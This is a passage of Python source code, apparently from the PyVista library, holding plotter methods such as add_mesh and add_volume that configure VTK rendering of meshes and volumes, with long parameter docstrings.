self.render_trigger.emit()
elif not self._first_time:
self.render()
def add_axes(self, interactive=None, line_width=2,
color=None, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', labels_off=False,
box=None, box_args=None):
""" Add an interactive axes widget """
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
update_axes_label_color(color)
return
if box is None:
box = rcParams['axes']['box']
if box:
if box_args is None:
box_args = {}
self.axes_actor = create_axes_orientation_box(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel,
labels_off=labels_off, **box_args)
else:
self.axes_actor = create_axes_marker(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel, labels_off=labels_off)
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
return
def hide_axes(self):
"""Hide the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def isometric_view_interactive(self):
""" sets the current interactive render window to isometric view """
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""
Update window, redraw, process messages query
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
loc=None, backface_culling=False, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, **kwargs):
"""
Adds any PyVista/VTK mesh or dataset that PyVista can wrap to the
scene. This method using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a siblge float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalar range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalar array from the mesh to
the the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custum made trasfer
function that is an aray either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalar display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result is showing colors that are not present in the color map.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalar array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first avaialble texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Bewteen 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
backface_culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
rgb : bool, optional
If an 2 dimensional array is passed as the scalars, plot those
values as RGB(A) colors! ``rgba`` is also accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transperency.
below_color : string or 3 item list, optional
Solid color for values below the scalar range (``clim``). This will
automatically set the scalar bar ``below_label`` to ``'Below'``
above_color : string or 3 item list, optional
Solid color for values below the scalar range (``clim``). This will
automatically set the scalar bar ``above_label`` to ``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalar range to annotate on the scalar bar and the values are the
the string annotations.
pickable : bool
Set whether this mesh is pickable
Returns
-------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if neccessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
if clim is None:
clim = kwargs.get('rng', None)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if nan_color is None:
nan_color = rcParams['nan_color']
nanr, nanb, nang = parse_color(nan_color)
nan_color = nanr, nanb, nang, nan_opacity
if color is True:
color = rcParams['color']
if texture == False:
texture = None
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
self.remove_actor(name, reset_camera=reset_camera)
# frist check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalar specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('Scalar array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.update(kwargs)
the_arguments.pop('self')
the_arguments.pop('mesh')
if multi_colors:
# Compute unique colors for each index of the block
try:
import matplotlib as mpl
from itertools import cycle
cycler = mpl.rcParams['axes.prop_cycle']
colors = cycle(cycler)
except ImportError:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalar components are not vectors/tuples
scalars = mesh.active_scalar_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalar.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=kwargs.get('preference', 'cell'), err=True)
if stitle is None:
stitle = original_scalar_name
if texture == True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=kwargs.get('preference', 'cell'), err=True)
opacity = normalize(opacity)
_custom_opac = True
except:
# Or get opacity trasfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <=1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalar formatting ===================================================
if cmap is None: # grab alias for cmaps: colormap
cmap = kwargs.get('colormap', None)
if cmap is None: # Set default map if matplotlib is avaialble
try:
import matplotlib
cmap = rcParams['cmap']
except ImportError:
pass
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
set_active = True
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitive and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb is False or rgb is None:
rgb = kwargs.get('rgba', False)
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool or (scalars.dtype == np.uint8 and not rgb):
scalars = scalars.astype(np.float)
def prepare_mapper(scalars):
# Scalar interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, set_active)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, set_active)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalar range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
cmap = None
logging.warning('Please install matplotlib for color maps.')
if cmap is not None:
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opactities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n' +
'\t"surface"\n' +
'\t"wireframe"\n' +
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
loc=None, backface_culling=False, multi_colors=False,
blending='composite', mapper='fixed_point',
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, **kwargs):
"""
Adds a volume, rendered using a fixed point ray cast mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UnformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalar range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custum made
trasfer function that is an aray either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
flip_scalars : bool, optional
Flip direction of cmap.
n_colors : int, optional
Number of colors to use when displaying scalars. Default
256.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
backface_culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
the scalar array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalar range to annotate on the scalar bar and the values are the
the string annotations.
Returns
-------
actor: vtk.vtkVolume
VTK volume of the input data.
"""
# Handle default arguments
if name is None:
name = '{}({})'.format(type(volume).__name__, str(hex(id(volume))))
if clim is None:
clim = kwargs.get('rng', None)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
# Convert the VTK data object to a pyvista wrapped object if neccessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered
volume = volume.copy()
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories, loc=loc,
backface_culling=backface_culling, clim=clim,
mapper=mapper, pickable=pickable, **kwargs)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type ({}) not supported for volume rendering at this time. Use `pyvista.UniformGrid`.')
if scalars is None:
# Make sure scalar components are not vectors/tuples
scalars = volume.active_scalar
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalar_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
set_active = False
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=kwargs.get('preference', 'point'), err=True)
if stitle is None:
stitle = title
else:
set_active = True
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point' : vtk.vtkFixedPointVolumeRayCastMapper,
'gpu' : vtk.vtkGPUVolumeRayCastMapper,
'open_gl' : vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart' : vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalar interpolation approach
if scalars.shape[0] == volume.n_points:
volume._add_point_array(scalars, title, set_active)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, set_active)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalar range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float)
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = np.nan
scalars[idxs1] = np.nan
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # grab alias for cmaps: colormap
cmap = kwargs.get('colormap', None)
if cmap is None: # Set default map if matplotlib is avaialble
try:
import matplotlib
cmap = rcParams['cmap']
except ImportError:
pass
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
cmap = None
raise RuntimeError('Please install matplotlib for volume rendering.')
if cmap is not None:
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError('Blending mode \'{}\' invalid. '.format(blending) +
'Please choose one ' + 'of \'additive\', ' +
'\'composite\', \'minimum\' or ' + '\'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
2 item list
The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
